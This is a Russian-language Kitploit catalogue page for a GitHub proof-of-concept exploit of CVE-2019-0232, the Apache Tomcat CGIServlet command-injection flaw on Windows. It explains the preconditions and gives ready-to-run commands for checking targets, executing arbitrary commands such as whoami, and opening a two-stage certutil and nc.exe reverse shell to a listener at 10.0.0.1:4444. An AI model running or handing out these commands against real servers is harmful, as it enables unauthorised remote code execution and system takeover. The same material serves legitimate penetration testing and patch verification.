Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-0232 — CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit | Kitploit
Инструменты/GitHubGitHub/yuzuki-ayanami/cve-2019-0232
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubyuzuki-ayanami/cve-2019-0232

CVE-2019-0232

CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

Репозиторий
11112 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
tomcat

CVE-2019-0232

Apache Tomcat CGIServlet enableCmdLineArguments RCE

Внедрение в Windows batch-скрипты через аргументы строки запроса

Описание

Apache Tomcat с включённым CGI-сервлетом и параметром enableCmdLineArguments=true передаёт аргументы строки запроса в качестве аргументов командной строки CGI-скриптам. В Windows batch-файлы (.bat/.cmd) интерпретируют символ & как разделитель команд, что позволяет выполнять произвольные команды через специально сформированный URL.

Предварительные условия

  • Включён CGI-сервлет в conf/web.xml или WEB-INF/web.xml
  • Параметр enableCmdLineArguments=true в init-params CGI-сервлета
  • Развёрнут и доступен CGI-скрипт (например, ism.bat)
  • Целевая система Windows (для инъекции через & необходимы batch-файлы)

Использование

git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt

Проверка наличия CGI-точки входа:

python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat

Выполнение команды:

python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'

Обратная оболочка (2-этапная: certutil + nc.exe):

python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444

Требования

  • Python 3.8+
  • requests
  • Целевая система Windows (уязвимость специфична для ОС)
Скачать инструмент